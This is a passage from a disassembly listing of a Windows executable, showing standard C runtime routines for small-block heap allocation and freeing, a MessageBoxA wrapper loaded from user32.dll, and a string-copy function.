retn
sub_403AE6 endp
; =============== S U B R O U T I N E =======================================
sub_403C6B proc near ; CODE XREF: sub_402D47+9�p
; sub_402D9F+D�p ...
cmp dword_407448, 0
jnz short locret_403C86
push 0FFFFFFFDh
call sub_4038A7
pop ecx
mov dword_407448, 1
locret_403C86: ; CODE XREF: sub_403C6B+7�j
retn
sub_403C6B endp
; =============== S U B R O U T I N E =======================================
sub_403C87 proc near ; CODE XREF: sub_402D9F+9D�p
; sub_4030A5+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403CB4
push esi
call sub_403D68
pop ecx
test eax, eax
push esi
jz short loc_403CA6
push eax
call sub_403D93
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403CA6: ; CODE XREF: sub_403C87+13�j
push 0
push dword_407328
call dword_405084 ; RtlFreeHeap
loc_403CB4: ; CODE XREF: sub_403C87+7�j
pop esi
retn
sub_403C87 endp
; =============== S U B R O U T I N E =======================================
sub_403CB6 proc near ; CODE XREF: sub_402D9F+3A�p
; sub_402D9F+6F�p ...
arg_0 = dword ptr 4
push dword_4070E0
push [esp+4+arg_0]
call sub_403CC8
pop ecx
pop ecx
retn
sub_403CB6 endp
; =============== S U B R O U T I N E =======================================
sub_403CC8 proc near ; CODE XREF: sub_403CB6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403CF1
loc_403CCF: ; CODE XREF: sub_403CC8+27�j
push [esp+arg_0]
call sub_403CF4
test eax, eax
pop ecx
jnz short locret_403CF3
cmp [esp+arg_4], eax
jz short locret_403CF3
push [esp+arg_0]
call sub_40494D
test eax, eax
pop ecx
jnz short loc_403CCF
loc_403CF1: ; CODE XREF: sub_403CC8+5�j
xor eax, eax
locret_403CF3: ; CODE XREF: sub_403CC8+13�j
; sub_403CC8+19�j
retn
sub_403CC8 endp
; =============== S U B R O U T I N E =======================================
sub_403CF4 proc near ; CODE XREF: sub_403CC8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_406F28
ja short loc_403D0C
push esi
call sub_4040BE
test eax, eax
pop ecx
jnz short loc_403D28
loc_403D0C: ; CODE XREF: sub_403CF4+B�j
test esi, esi
jnz short loc_403D13
push 1
pop esi
loc_403D13: ; CODE XREF: sub_403CF4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_407328
call dword_405060 ; RtlAllocateHeap
loc_403D28: ; CODE XREF: sub_403CF4+16�j
pop esi
retn
sub_403CF4 endp
; =============== S U B R O U T I N E =======================================
sub_403D2A proc near ; CODE XREF: sub_403382+20�p
push 140h
push 0
push dword_407328
call dword_405060 ; RtlAllocateHeap
test eax, eax
mov dword_4070FC, eax
jnz short loc_403D47
retn
; ---------------------------------------------------------------------------
loc_403D47: ; CODE XREF: sub_403D2A+1A�j
and dword_4070F4, 0
and dword_4070F8, 0
push 1
mov dword_4070F0, eax
mov dword_4070E8, 10h
pop eax
retn
sub_403D2A endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403C87+A�p
arg_0 = dword ptr 4
mov eax, dword_4070F8
lea ecx, [eax+eax*4]
mov eax, dword_4070FC
lea ecx, [eax+ecx*4]
loc_403D78: ; CODE XREF: sub_403D68+26�j
cmp eax, ecx
jnb short loc_403D90
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403D92
add eax, 14h
jmp short loc_403D78
; ---------------------------------------------------------------------------
loc_403D90: ; CODE XREF: sub_403D68+12�j
xor eax, eax
locret_403D92: ; CODE XREF: sub_403D68+21�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D93 proc near ; CODE XREF: sub_403C87+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403E59
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403DEB
mov [ebp+arg_4], edi
loc_403DEB: ; CODE XREF: sub_403D93+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403E3D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403E19
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403E3D
; ---------------------------------------------------------------------------
loc_403E19: ; CODE XREF: sub_403D93+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403E3D: ; CODE XREF: sub_403D93+60�j
; sub_403D93+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403E59: ; CODE XREF: sub_403D93+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403E67
push 3Fh
pop edi
loc_403E67: ; CODE XREF: sub_403D93+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403F16
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403E92
mov [ebp+arg_4], edx
mov ecx, edx
loc_403E92: ; CODE XREF: sub_403D93+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403EA4
mov edi, edx
loc_403EA4: ; CODE XREF: sub_403D93+10D�j
cmp ecx, edi
jz short loc_403F13
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403EFB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403ED7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403EFB
; ---------------------------------------------------------------------------
loc_403ED7: ; CODE XREF: sub_403D93+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403EFB: ; CODE XREF: sub_403D93+11E�j
; sub_403D93+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403F13: ; CODE XREF: sub_403D93+113�j
mov edx, [ebp+var_8]
loc_403F16: ; CODE XREF: sub_403D93+DD�j
cmp [ebp+var_14], 0
jnz short loc_403F25
cmp [ebp+arg_4], edi
jz loc_403FAE
loc_403F25: ; CODE XREF: sub_403D93+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403FAE
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_403F82
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F71
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_403F71: ; CODE XREF: sub_403D93+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_403FAB
; ---------------------------------------------------------------------------
loc_403F82: ; CODE XREF: sub_403D93+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F98
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403F98: ; CODE XREF: sub_403D93+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_403FAB: ; CODE XREF: sub_403D93+1ED�j
mov ebx, [ebp+var_C]
loc_403FAE: ; CODE XREF: sub_403D93+18C�j
; sub_403D93+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4040B9
mov eax, dword_4070F4
test eax, eax
jz loc_4040AB
mov ecx, dword_4070EC
mov edi, dword_405088
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; dword_405088
mov ecx, dword_4070EC
mov eax, dword_4070F4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_4070F4
mov ecx, dword_4070EC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_4070F4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_4070F4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404039
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_4070F4
loc_404039: ; CODE XREF: sub_403D93+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4040AB
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; dword_405088
mov eax, dword_4070F4
push dword ptr [eax+10h]
push 0
push dword_407328
call dword_405084 ; RtlFreeHeap
mov eax, dword_4070F8
mov edx, dword_4070FC
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_4070F4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404970
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4070F8
cmp eax, dword_4070F4
jbe short loc_40409D
sub eax, 14h
loc_40409D: ; CODE XREF: sub_403D93+305�j
mov ecx, dword_4070FC
mov dword_4070F0, ecx
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_403D93+233�j
; sub_403D93+2AA�j
mov eax, [ebp+arg_0]
loc_4040AE: ; CODE XREF: sub_403D93+316�j
mov dword_4070F4, eax
mov dword_4070EC, esi
loc_4040B9: ; CODE XREF: sub_403D93+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403D93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040BE proc near ; CODE XREF: sub_403CF4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_4070F8
mov edx, dword_4070FC
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4040FE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_40410E
; ---------------------------------------------------------------------------
loc_4040FE: ; CODE XREF: sub_4040BE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_40410E: ; CODE XREF: sub_4040BE+3E�j
mov eax, dword_4070F0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404135
loc_40411C: ; CODE XREF: sub_4040BE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404135
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40411C
loc_404135: ; CODE XREF: sub_4040BE+5C�j
; sub_4040BE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4041B3
mov ebx, edx
loc_40413C: ; CODE XREF: sub_4040BE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404158
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404156
add ebx, 14h
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_4040BE+91�j
cmp ebx, eax
loc_404158: ; CODE XREF: sub_4040BE+83�j
jnz short loc_4041B3
loc_40415A: ; CODE XREF: sub_4040BE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404170
cmp dword ptr [ebx+8], 0
jnz short loc_40416D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40415A
; ---------------------------------------------------------------------------
loc_40416D: ; CODE XREF: sub_4040BE+A5�j
cmp ebx, [ebp+var_4]
loc_404170: ; CODE XREF: sub_4040BE+9F�j
jnz short loc_404198
mov ebx, edx
loc_404174: ; CODE XREF: sub_4040BE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404188
cmp dword ptr [ebx+8], 0
jnz short loc_404186
add ebx, 14h
jmp short loc_404174
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_4040BE+C1�j
cmp ebx, eax
loc_404188: ; CODE XREF: sub_4040BE+BB�j
jnz short loc_404198
call sub_4043C7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4041AC
loc_404198: ; CODE XREF: sub_4040BE:loc_404170�j
; sub_4040BE:loc_404188�j
push ebx
call sub_404478
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4041B3
loc_4041AC: ; CODE XREF: sub_4040BE+D8�j
xor eax, eax
jmp loc_4043C2
; ---------------------------------------------------------------------------
loc_4041B3: ; CODE XREF: sub_4040BE+7A�j
; sub_4040BE:loc_404158�j ...
mov dword_4070F0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4041DA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404211
loc_4041DA: ; CODE XREF: sub_4040BE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_40420E
loc_4041F7: ; CODE XREF: sub_4040BE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4041F7
loc_40420E: ; CODE XREF: sub_4040BE+137�j
mov edx, [ebp+var_4]
loc_404211: ; CODE XREF: sub_4040BE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40423A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40423A: ; CODE XREF: sub_4040BE+16D�j
; sub_4040BE+183�j
test ecx, ecx
jl short loc_404243
shl ecx, 1
inc edi
jmp short loc_40423A
; ---------------------------------------------------------------------------
loc_404243: ; CODE XREF: sub_4040BE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404260
push 3Fh
pop esi
loc_404260: ; CODE XREF: sub_4040BE+19D�j
cmp esi, edi
jz loc_404375
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4042D1
cmp edi, 20h
jge short loc_4042A0
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042A0: ; CODE XREF: sub_4040BE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042CE: ; CODE XREF: sub_4040BE+1D6�j
; sub_4040BE+203�j
mov ebx, [ebp+arg_0]
loc_4042D1: ; CODE XREF: sub_4040BE+1B0�j
; sub_4040BE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404381
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404372
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404343
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404331
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404331: ; CODE XREF: sub_4040BE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404372
; ---------------------------------------------------------------------------
loc_404343: ; CODE XREF: sub_4040BE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40435C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40435C: ; CODE XREF: sub_4040BE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404372: ; CODE XREF: sub_4040BE+24E�j
; sub_4040BE+283�j
mov ecx, [ebp+var_8]
loc_404375: ; CODE XREF: sub_4040BE+1A4�j
test ecx, ecx
jz short loc_404384
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404384
; ---------------------------------------------------------------------------
loc_404381: ; CODE XREF: sub_4040BE+229�j
mov ecx, [ebp+var_8]
loc_404384: ; CODE XREF: sub_4040BE+2B9�j
; sub_4040BE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4043BA
cmp ebx, dword_4070F4
jnz short loc_4043BA
mov ecx, [ebp+var_4]
cmp ecx, dword_4070EC
jnz short loc_4043BA
and dword_4070F4, 0
loc_4043BA: ; CODE XREF: sub_4040BE+2E0�j
; sub_4040BE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4043C2: ; CODE XREF: sub_4040BE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4040BE endp
; =============== S U B R O U T I N E =======================================
sub_4043C7 proc near ; CODE XREF: sub_4040BE+CC�p
mov eax, dword_4070F8
mov ecx, dword_4070E8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_40440A
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_4070FC
push edi
push dword_407328
call dword_405058 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_40445A
add dword_4070E8, 10h
mov dword_4070FC, eax
mov eax, dword_4070F8
loc_40440A: ; CODE XREF: sub_4043C7+11�j
mov ecx, dword_4070FC
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_407328
lea esi, [ecx+eax*4]
call dword_405060 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40445A
push 4
push 2000h
push 100000h
push edi
call dword_40505C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40445E
push dword ptr [esi+10h]
push edi
push dword_407328
call dword_405084 ; RtlFreeHeap
loc_40445A: ; CODE XREF: sub_4043C7+30�j
; sub_4043C7+67�j
xor eax, eax
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40445E: ; CODE XREF: sub_4043C7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_4070F8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404475: ; CODE XREF: sub_4043C7+95�j
pop edi
pop esi
retn
sub_4043C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404478 proc near ; CODE XREF: sub_4040BE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40448A: ; CODE XREF: sub_404478+19�j
test eax, eax
jl short loc_404493
shl eax, 1
inc ebx
jmp short loc_40448A
; ---------------------------------------------------------------------------
loc_404493: ; CODE XREF: sub_404478+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4044A8: ; CODE XREF: sub_404478+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4044A8
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_40505C ; VirtualAlloc
test eax, eax
jnz short loc_4044DB
or eax, 0FFFFFFFFh
jmp loc_40456E
; ---------------------------------------------------------------------------
loc_4044DB: ; CODE XREF: sub_404478+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404521
lea eax, [edi+10h]
loc_4044E8: ; CODE XREF: sub_404478+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4044E8
loc_404521: ; CODE XREF: sub_404478+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40455E
or [eax+4], edi
loc_40455E: ; CODE XREF: sub_404478+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40456E: ; CODE XREF: sub_404478+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404478 endp
; =============== S U B R O U T I N E =======================================
sub_404573 proc near ; CODE XREF: sub_4035C9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_4070B0, ebx
push esi
push edi
jnz short loc_4045C2
push offset aUser32_dll ; "user32.dll"
call dword_405014 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4045F8
mov esi, dword_405054
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_405054
test eax, eax
mov dword_4070B0, eax
jz short loc_4045F8
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_405054
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4070B4, eax
call esi ; dword_405054
mov dword_4070B8, eax
loc_4045C2: ; CODE XREF: sub_404573+B�j
mov eax, dword_4070B4
test eax, eax
jz short loc_4045E1
call eax ; dword_4070B4
mov ebx, eax
test ebx, ebx
jz short loc_4045E1
mov eax, dword_4070B8
test eax, eax
jz short loc_4045E1
push ebx
call eax ; dword_4070B8
mov ebx, eax
loc_4045E1: ; CODE XREF: sub_404573+56�j
; sub_404573+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_4070B0 ; MessageBoxA
loc_4045F4: ; CODE XREF: sub_404573+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4045F8: ; CODE XREF: sub_404573+1C�j
; sub_404573+33�j
xor eax, eax
jmp short loc_4045F4
sub_404573 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404600 proc near ; CODE XREF: sub_4035C9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404683
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404624
shr ecx, 2
jnz short loc_404691
jmp short loc_404645
; ---------------------------------------------------------------------------
loc_404624: ; CODE XREF: sub_404600+1B�j
; sub_404600+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404652
test al, al
jz short loc_40465A
test esi, 3
jnz short loc_404624
mov ebx, ecx
shr ecx, 2
jnz short loc_404691
loc_404640: ; CODE XREF: sub_404600+8F�j
and ebx, 3
jz short loc_404652
loc_404645: ; CODE XREF: sub_404600+22�j
; sub_404600+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40467E
dec ebx
jnz short loc_404645
loc_404652: ; CODE XREF: sub_404600+2B�j
; sub_404600+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40465A: ; CODE XREF: sub_404600+2F�j
test edi, 3
jz short loc_404674
loc_404662: ; CODE XREF: sub_404600+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4046F6
test edi, 3
jnz short loc_404662
loc_404674: ; CODE XREF: sub_404600+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4046E7
loc_40467B: ; CODE XREF: sub_404600+7F�j
; sub_404600+F4�j
mov [edi], al
inc edi
loc_40467E: ; CODE XREF: sub_404600+4D�j
dec ebx
jnz short loc_40467B
pop ebx
pop esi
loc_404683: ; CODE XREF: sub_404600+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404689: ; CODE XREF: sub_404600+A9�j
; sub_404600+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404640
loc_404691: ; CODE XREF: sub_404600+20�j
; sub_404600+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404689
test dl, dl
jz short loc_4046DB
test dh, dh
jz short loc_4046D1
test edx, 0FF0000h
jz short loc_4046C7
test edx, 0FF000000h
jnz short loc_404689
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046C7: ; CODE XREF: sub_404600+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_404600+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
